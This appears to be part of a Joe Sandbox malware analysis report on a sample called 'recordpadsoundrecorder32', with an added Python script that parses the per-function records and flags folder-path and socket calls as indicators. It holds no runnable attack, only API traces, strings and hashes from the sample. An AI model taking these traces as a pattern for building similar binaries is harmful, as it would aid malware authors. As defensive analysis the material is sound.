                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                      • String ID: \save.dat
                                                                                      • API String ID: 4128168839-3580179773
                                                                                      • Opcode ID: 60a608b3313670dd4b6d251503f343d2fdad937a2c898402072cbdb3bca66f5f
                                                                                      • Instruction ID: b350d139643547a7a2ac8762bc9e2617d54bab3e1e732f1cfe73c7b49495021b
                                                                                      • Opcode Fuzzy Hash: 60a608b3313670dd4b6d251503f343d2fdad937a2c898402072cbdb3bca66f5f
                                                                                      • Instruction Fuzzy Hash: 7F1190329042546BDB29CE658CC4E5FFF6BEF82654B1441ECE84667341EBA21D06DAA0
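The record above is the one an analyst working from this listing would pull out first: a direct call to SHGetSpecialFolderPathA with CSIDL 0x23 sitting next to the string "\save.dat", inside a memory region the report marks "based on PE: false" (memory not mapped from the on-disk image, unlike the 0x400000 records). The script below is an added example, not Joe Sandbox code: it parses records in the report's own layout (APIs / Strings / Memory Dump Source / Similarity) into structured rows, counts functions per dump region, and flags folder-resolution and socket calls. SAMPLE is constructed to mirror two of the records on this page; the CSIDL names come from shlobj.h; the "likely on-disk artifact" line joins the resolved folder with the record's String ID and is an inference, not something the report states.

```python
"""Parse Joe Sandbox per-function records into rows and surface the findings an
analyst wants first.  Added example, not Joe Sandbox code; SAMPLE is constructed
to mirror the report layout (two records from this page)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the report's own layout (section labels, bullet lines).
SAMPLE = r"""
APIs
• _malloc.LIBCMT ref: 0260535D
  • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 0260536F
Strings
Memory Dump Source
• Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
Similarity
• API ID: AllocateFolderHeapPathSpecial_malloc
• String ID: \save.dat
• Instruction Fuzzy Hash: 7F1190329042546BDB29CE658CC4E5FFF6BEF82654B1441ECE84667341EBA21D06DAA0
APIs
• WSASetLastError.WS2_32(00000000,?), ref: 0260967E
• getsockname.WS2_32(?,?,?), ref: 02609694
Memory Dump Source
• Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
Similarity
• API ID: ErrorLastgetsockname
• String ID: &'
• Instruction Fuzzy Hash: 06218371A112089BDB14DFA8D844ACFF7F5FF48310F11856AE919EB281D730A9458B54
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
# "• Name.MODULE(args), ref: ADDR"  or  "• Name.MODULE ref: ADDR" (no args)
API_RE = re.compile(r"^•\s+(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")
# CSIDL constants resolved by SHGetSpecialFolderPath* (values from shlobj.h).
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
         0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # ints for hex literals, None for the report's "?"
    ref: int            # call-site address


@dataclass
class Record:
    apis: list = field(default_factory=list)      # direct calls only
    strings: list = field(default_factory=list)   # "Strings" section entries
    string_id: str = ""                           # "String ID" under Similarity
    dump_file: str = ""
    pe_backed: Optional[bool] = None              # "based on PE: true/false"
    fuzzy_hash: str = ""


def _parse_arg(tok):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok


def parse_records(text):
    """Each 'APIs' label opens a new record; bullets are filed by current section."""
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                cur = Record()
                records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        if section == "APIs":
            if "Part of subcall" in line:     # callee's calls; keep direct calls only
                continue
            m = API_RE.match(line)
            if m:
                args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
                cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif section == "Strings":
            cur.strings.append(line[1:].strip().rsplit(", xrefs:", 1)[0])
        elif section == "Memory Dump Source":
            m = SRC_RE.search(line)
            if m:
                cur.dump_file, cur.pe_backed = m["file"], m["pe"] == "true"
        elif section == "Similarity":
            if line.startswith("• String ID:"):
                cur.string_id = line.split(":", 1)[1].strip()
            elif line.startswith("• Instruction Fuzzy Hash:"):
                cur.fuzzy_hash = line.split(":", 1)[1].strip()
    return records


def by_region(records):
    """Functions per dump region; a large non-PE-backed region is unpacked code."""
    counts = {}
    for r in records:
        key = (r.dump_file, r.pe_backed)
        counts[key] = counts.get(key, 0) + 1
    return counts


def findings(records):
    out = []
    for r in records:
        region = "PE-backed" if r.pe_backed else "non-PE-backed"
        for c in r.apis:
            if c.name.startswith("SHGetSpecialFolderPath") and len(c.args) >= 3 \
                    and isinstance(c.args[2], int):
                folder = CSIDL.get(c.args[2], "CSIDL_0x%X" % c.args[2])
                out.append(f"{c.ref:08X}: resolves {folder}; with String ID {r.string_id!r} "
                           f"-> likely on-disk artifact {folder}{r.string_id} (inference)")
            if c.module == "WS2_32":
                out.append(f"{c.ref:08X}: socket API {c.name} in {region} region")
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for (f, pe), n in by_region(recs).items():
        print(f"{n} function(s) in {f} (PE-backed={pe})")
    for line in findings(recs):
        print(line)
```

Run against the full report text instead of SAMPLE, the region count separates the 0x400000 image functions from the 0x2601000 region, and the findings list gives the host and network IOC candidates to pivot on.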
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260396A
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 026039C1
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260A5CC: __EH_prolog.LIBCMT ref: 0260A5D1
                                                                                        • Part of subcall function 0260A5CC: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0260A5E0
                                                                                        • Part of subcall function 0260A5CC: __CxxThrowException@8.LIBCMT ref: 0260A5FF
                                                                                      Strings
                                                                                      • Day of month is not valid for year, xrefs: 026039AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Day of month is not valid for year
                                                                                      • API String ID: 1404951899-1521898139
                                                                                      • Opcode ID: 5fcc7ae644ad72ba8f79e7680cc170df2e62fc01501c0b678a77c9d11bbf06e2
                                                                                      • Instruction ID: e5154327fde5bd2ffffd63088524da5f61896813da93175e0c45dd2b247a1d33
                                                                                      • Opcode Fuzzy Hash: 5fcc7ae644ad72ba8f79e7680cc170df2e62fc01501c0b678a77c9d11bbf06e2
                                                                                      • Instruction Fuzzy Hash: EA019E76810219AADB09EFA4C841AEFB779FF18710F40441AE804A3280EB704A59DFA9
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0260FAC5
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0260FADA
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 4063778783-2104205924
                                                                                      • Opcode ID: 9a5ac043342942f05605d04e5c74007fe5a1e1b39b7362f3c5c093356ded5dad
                                                                                      • Instruction ID: cd01cf19897a1a3711a800925af96beb747bd5bda0b343cde0ee1b93a5a76f09
                                                                                      • Opcode Fuzzy Hash: 9a5ac043342942f05605d04e5c74007fe5a1e1b39b7362f3c5c093356ded5dad
                                                                                      • Instruction Fuzzy Hash: 0DF0AE7060035966DF0CEA98D995DAF73EDFB04314F404569A827D33C0EF70F9049595
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603C1B
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02603C30
                                                                                        • Part of subcall function 02612467: std::exception::exception.LIBCMT ref: 02612471
                                                                                        • Part of subcall function 0260A605: __EH_prolog.LIBCMT ref: 0260A60A
                                                                                        • Part of subcall function 0260A605: __CxxThrowException@8.LIBCMT ref: 0260A633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 1300498068-3145022300
                                                                                      • Opcode ID: db302f92badd1af605c41cdae55097b6e42676a7d45b496e4401da73d2726dfa
                                                                                      • Instruction ID: afe6a8c1827db97760abe69b291034d990b6607164420dea96027de4791cbd25
                                                                                      • Opcode Fuzzy Hash: db302f92badd1af605c41cdae55097b6e42676a7d45b496e4401da73d2726dfa
                                                                                      • Instruction Fuzzy Hash: D5F02032900604CBCB0DDF88D580AEBB775EF01311F1040AEED069B380CBB29A8ACE94
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026038D2
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 026038F1
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      Strings
                                                                                      • Year is out of valid range: 1400..10000, xrefs: 026038E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Year is out of valid range: 1400..10000
                                                                                      • API String ID: 3258419250-2344417016
                                                                                      • Opcode ID: 46e284429d801a362f85643f179365eabc1a9a4532f1182d6259c809a9b13648
                                                                                      • Instruction ID: 0c7c7a9fccd43c1691effadc54faf54023249ddbe201511495eb01107c4c28da
                                                                                      • Opcode Fuzzy Hash: 46e284429d801a362f85643f179365eabc1a9a4532f1182d6259c809a9b13648
                                                                                      • Instruction Fuzzy Hash: 95E09272A405249BEB28EF9489557EEB765DB08710F40445EE406672C0DAB11958CF9A
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603886
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 026038A5
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      Strings
                                                                                      • Day of month value is out of range 1..31, xrefs: 02603894
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Day of month value is out of range 1..31
                                                                                      • API String ID: 3258419250-1361117730
                                                                                      • Opcode ID: 315f74f22b34dd85975f19d6eb3b976dbbd9a413e55f7165ac278ed331bae7e7
                                                                                      • Instruction ID: f0452aaf68929a8cddb7b92e42faf9c98792674742e566bf2b2d5b2e2e2e7d63
                                                                                      • Opcode Fuzzy Hash: 315f74f22b34dd85975f19d6eb3b976dbbd9a413e55f7165ac278ed331bae7e7
                                                                                      • Instruction Fuzzy Hash: E5E0D872E405249BDB2CFF94CD55BEEB775EB08710F40404EE806632C0DAB11958DF99
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260391E
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 0260393D
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      Strings
                                                                                      • Month number is out of range 1..12, xrefs: 0260392C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: Month number is out of range 1..12
                                                                                      • API String ID: 3258419250-4198407886
                                                                                      • Opcode ID: 10e03a1b031c3b602805be90c2ee9126f2dd6624c499186a9d57f411cdb26164
                                                                                      • Instruction ID: f2446adf76b196a65707743ac0abf600985774851553ce6c6336ebf6828b1040
                                                                                      • Opcode Fuzzy Hash: 10e03a1b031c3b602805be90c2ee9126f2dd6624c499186a9d57f411cdb26164
                                                                                      • Instruction Fuzzy Hash: 25E0D872E405249BD72CFF94CD557EEB775DB08710F40404EE806632C0DAB119588F9A
                                                                                      APIs
                                                                                      • TlsAlloc.KERNEL32 ref: 026019CC
                                                                                      • GetLastError.KERNEL32 ref: 026019D9
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocErrorH_prologLast
                                                                                      • String ID: tss
                                                                                      • API String ID: 249634027-1638339373
                                                                                      • Opcode ID: e55b08bf0f07508ddf91e139711b50da83cd4b1ed2de6eab26782c94d7253597
                                                                                      • Instruction ID: cefd36bd7838609a2cdb061f610121554b630f1e3e4992daf32062ba4ed7f58b
                                                                                      • Opcode Fuzzy Hash: e55b08bf0f07508ddf91e139711b50da83cd4b1ed2de6eab26782c94d7253597
                                                                                      • Instruction Fuzzy Hash: 57E08671D456105BC3107B78E84848FFBA49A45235F118B6EFCBE832D0EA3059589BD6
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603BD8
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02603BED
                                                                                        • Part of subcall function 02612467: std::exception::exception.LIBCMT ref: 02612471
                                                                                        • Part of subcall function 0260A605: __EH_prolog.LIBCMT ref: 0260A60A
                                                                                        • Part of subcall function 0260A605: __CxxThrowException@8.LIBCMT ref: 0260A633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 1300498068-3145022300
                                                                                      • Opcode ID: 97218788111c1c38423d3e9ac40d1b795ffd59b177d250fb0af216ba8350b2d5
                                                                                      • Instruction ID: 05bb741af36170c83c88f31a9ed37bcecd0243800dd7f43ac17ab1391b9a8621
                                                                                      • Opcode Fuzzy Hash: 97218788111c1c38423d3e9ac40d1b795ffd59b177d250fb0af216ba8350b2d5
                                                                                      • Instruction Fuzzy Hash: ADE09A70900208DBC718EF94D291BB9B771EB14305F4080ACD802573D0DB315949CE89
                                                                                      APIs
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404AD8
                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B0C
                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B26
                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B3D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3499195154-0
                                                                                      • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction ID: e332c3e7fbabb4a530177a7352d9393d0fbd82ec7ab2db7e11d44f19093e014a
                                                                                      • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction Fuzzy Hash: 611116B0201601DFC7219F19EE85E22BBB5FB84720711463AF292E65F0D771A845CF5C